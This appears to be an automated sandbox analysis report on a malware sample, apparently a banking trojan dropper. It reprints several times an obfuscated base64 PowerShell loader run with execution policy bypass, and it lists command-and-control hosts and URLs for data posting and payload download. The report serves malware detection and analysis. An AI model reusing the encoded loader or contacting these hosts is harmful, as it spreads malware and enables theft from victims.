JAB4AD0AJwA1AGYAYgA2ADgAOQA1ADAALQA5AGEAYgBlAC0ANABhADkAMQAtADgAZABmADcALQA5ADIANQBjADQANAAxADgAMwBlAGUAMgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAUgBjAEYAQgBNAHAAaAA2AHoAdQAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZw
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA1AGYAYgA2ADgAOQA1ADAALQA5AGEAYgBlAC0ANABhADkAMQAtADgAZABmADcALQA5ADIANQBjADQANAAxADgAMwBlAGUAMgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAUgBjAEYAQgBNAHAAaAA2AHoAdQAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA==, CommandLine: "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA1AGYAYgA2ADgAOQA1ADAALQA5AGEAYgBlAC0ANABhADkAMQAtADgAZABmADcALQA5ADIANQBjADQANAAxADgAMwBlAGUAMgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAUgBjAEYAQgBNAHAAaAA2AHoAdQAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZw
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1364, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Nvidia-48001\Nvidia-48001.exe (copy)ReversingLabs: Detection: 23%
Source: C:\Nvidia-48001\play.exeReversingLabs: Detection: 23%
Source: RcFBMph6zu.exeVirustotal: Detection: 23%Perma Link
Source: RcFBMph6zu.exeReversingLabs: Detection: 23%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.1% probability
Source: RcFBMph6zu.exeJoe Sandbox ML: detected

Compliance

barindex
Source: RcFBMph6zu.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: RcFBMph6zu.exeStatic PE information: certificate valid
Source: unknownHTTPS traffic detected: 34.95.215.169:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: RcFBMph6zu.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Nvidia-48001.exe, 0000000B.00000002.2668651451.0000000005F31000.00000020.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: Nvidia-48001.exe, 0000000B.00000002.2668651451.0000000005F31000.00000020.10000000.00040000.00000000.sdmp
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: global trafficHTTP traffic detected: POST /avs_pro/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 135Host: 23.94.207.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.207.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.207.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.207.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.207.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.207.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.207.151
Source: unknownTCP traffic detected without corresponding DNS query: 23.94.207.151
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /notafiscal/download/cat.zip HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Wed, 18 Dec 2024 07:18:28 GMTUser-Agent: Microsoft BITS/7.8Host: site.webmailcontabilidadecrx.net
Source: global trafficDNS traffic detected: DNS query: site.webmailcontabilidadecrx.net
Source: unknownHTTP traffic detected: POST /avs_pro/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 135Host: 23.94.207.151
Source: Nvidia-48001.exe, 0000000A.00000003.2834437101.0000000001C7B000.00000004.00000020.00020000.00000000.sdmp, Nvidia-48001.exe, 0000000A.00000003.3153575949.0000000001C7E000.00000004.00000020.00020000.00000000.sdmp, Nvidia-48001.exe, 0000000A.00000003.3153387423.0000000001C7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.94.207.151/
Source: Nvidia-48001.exe, 0000000A.00000003.2834437101.0000000001C7B000.00000004.00000020.00020000.00000000.sdmp, Nvidia-48001.exe, 0000000A.00000003.3153575949.0000000001C7E000.00000004.00000020.00020000.00000000.sdmp, Nvidia-48001.exe, 0000000A.00000003.3153387423.0000000001C7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.94.207.151/DF
Source: Nvidia-48001.exe, 0000000A.00000003.2834676511.0000000001C45000.00000004.00000020.00020000.00000000.sdmp, Nvidia-48001.exe, 0000000A.00000003.2834437101.0000000001C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.94.207.151/avs_pro/index.php
Source: Nvidia-48001.exe, 0000000A.00000003.2834437101.0000000001C7B000.00000004.00000020.00020000.00000000.sdmp, Nvidia-48001.exe, 0000000A.00000003.3153575949.0000000001C7E000.00000004.00000020.00020000.00000000.sdmp, Nvidia-48001.exe, 0000000A.00000003.3153387423.0000000001C7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.94.207.151/iF&
Source: powershell.exe, 00000002.00000002.4651321766.0000029483234000.00000004.00000800.00020000.00000000.sdmp, RcFBMph6zu.exe, play.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: powershell.exe, 00000002.00000002.4651321766.0000029483234000.00000004.00000800.00020000.00000000.sdmp, RcFBMph6zu.exe, play.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: powershell.exe, 00000002.00000002.4651321766.0000029483234000.00000004.00000800.00020000.00000000.sdmp, RcFBMph6zu.exe, play.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000002.00000002.4651321766.0000029483234000.00000004.00000800.00020000.00000000.sdmp, RcFBMph6zu.exe, play.exe.2.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: powershell.exe, 00000002.00000002.4651321766.0000029483234000.00000004.00000800.00020000.00000000.sdmp, RcFBMph6zu.exe, play.exe.2.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0(
Source: svchost.exe, 00000006.00000002.3705808908.000001C4BC400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: powershell.exe, 00000002.00000002.4651321766.0000029483234000.00000004.00000800.00020000.00000000.sdmp, RcFBMph6zu.exe, play.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: powershell.exe, 00000002.00000002.4651321766.0000029483234000.00000004.00000800.00020000.00000000.sdmp, RcFBMph6zu.exe, play.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: powershell.exe, 00000002.00000002.4651321766.0000029483234000.00000004.00000800.00020000.00000000.sdmp, RcFBMph6zu.exe, play.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000002.00000002.4718804619.0000029490071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.4651321766.0000029483234000.00000004.00000800.00020000.00000000.sdmp, RcFBMph6zu.exe, play.exe.2.drString found in binary or memory: http://ocsp.digicert.com0A
Source: powershell.exe, 00000002.00000002.4651321766.0000029483234000.00000004.00000800.00020000.00000000.sdmp, RcFBMph6zu.exe, play.exe.2.drString found in binary or memory: http://ocsp.digicert.com0C
Source: powershell.exe, 00000002.00000002.4651321766.0000029483234000.00000004.00000800.00020000.00000000.sdmp, RcFBMph6zu.exe, play.exe.2.drString found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000002.00000002.4651321766.0000029483234000.00000004.00000800.00020000.00000000.sdmp, RcFBMph6zu.exe, play.exe.2.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: powershell.exe, 00000002.00000002.4651321766.0000029483234000.00000004.00000800.00020000.00000000.sdmp, RcFBMph6zu.exe, play.exe.2.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: powershell.exe, 00000002.00000002.4651321766.0000029480225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.4651321766.0000029480225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.4651321766.0000029480001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.4651321766.0000029480225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.4651321766.0000029483234000.00000004.00000800.00020000.00000000.sdmp, RcFBMph6zu.exe, play.exe.2.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: powershell.exe, 00000002.00000002.4651321766.0000029483234000.00000004.00000800.00020000.00000000.sdmp, RcFBMph6zu.exe, play.exe.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: powershell.exe, 00000002.00000002.4651321766.0000029480225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Nvidia-48001.exe, 0000000B.00000003.2644408900.0000000004590000.00000004.00001000.00020000.00000000.sdmp, Nvidia-48001.exe, 0000000B.00000002.2647565835.000000000261B000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.indyproject.org/
Source: powershell.exe, 00000002.00000002.4742018969.00000294FAC80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
Source: powershell.exe, 00000002.00000002.4651321766.0000029480001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.4651321766.0000029480225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000002.00000002.4718804619.0000029490071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.4718804619.0000029490071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.4718804619.0000029490071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000006.00000003.2258368402.000001C4BC200000.00000004.00000800.00020000.00000000.sdmp, edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000002.00000002.4651321766.0000029480225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.4718804619.0000029490071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000006.00000002.3706091698.000001C4BC460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://site.webmailcontabilidadecrx.net/1003
Source: svchost.exe, 00000006.00000002.3706091698.000001C4BC48E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2321587069.000001C4BC201000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2344242486.000001C4BC204000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3706244111.000001C4BC4DB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2519402063.000001C4BC205000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3698164215.000001C4BC360000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3700001299.000001C4B7704000.00000004.00000020.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: https://site.webmailcontabilidadecrx.net/notafiscal/download/cat.zip
Source: svchost.exe, 00000006.00000002.3706091698.000001C4BC48E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://site.webmailcontabilidadecrx.net/notafiscal/download/cat.zipice
Source: powershell.exe, 00000002.00000002.4651321766.0000029480225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://site.webmailcontabilidadecrx.net/notafiscal/receive_info.php
Source: svchost.exe, 00000006.00000002.3706091698.000001C4BC460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://site.webmailcontabilidadecrx.net:443/notafiscal/download/cat.zip
Source: powershell.exe, 00000002.00000002.4651321766.0000029483234000.00000004.00000800.00020000.00000000.sdmp, RcFBMph6zu.exe, play.exe.2.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownHTTPS traffic detected: 34.95.215.169:443 -> 192.168.2.6:49737 version: TLS 1.2

E-Banking Fraud

barindex
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA1AGYAYgA2ADgAOQA1ADAALQA5AGEAYgBlAC0ANABhADkAMQAtADgAZABmADcALQA5ADIANQBjADQANAAxADgAMwBlAGUAMgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAUgBjAEYAQgBNAHAAaAA2AHoAdQAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA==
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA1AGYAYgA2ADgAOQA1ADAALQA5AGEAYgBlAC0ANABhADkAMQAtADgAZABmADcALQA5ADIANQBjADQANAAxADgAMwBlAGUAMgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAUgBjAEYAQgBNAHAAaAA2AHoAdQAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA==Jump to behavior

System Summary

barindex
Source: amsi64_7108.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: RcFBMph6zu.exe, _88.csLong String: Length: 22184
Source: play.exe.2.drStatic PE information: section name: .!Zx
Source: play.exe.2.drStatic PE information: section name: .]#m
Source: play.exe.2.drStatic PE information: section name: .2"V
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Nvidia-48001\Nvidia-48001.exe (copy)Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Nvidia-48001\play.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34216FB62_2_00007FFD34216FB6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD342045FB2_2_00007FFD342045FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3421E6B52_2_00007FFD3421E6B5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD342061B52_2_00007FFD342061B5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34210CD12_2_00007FFD34210CD1
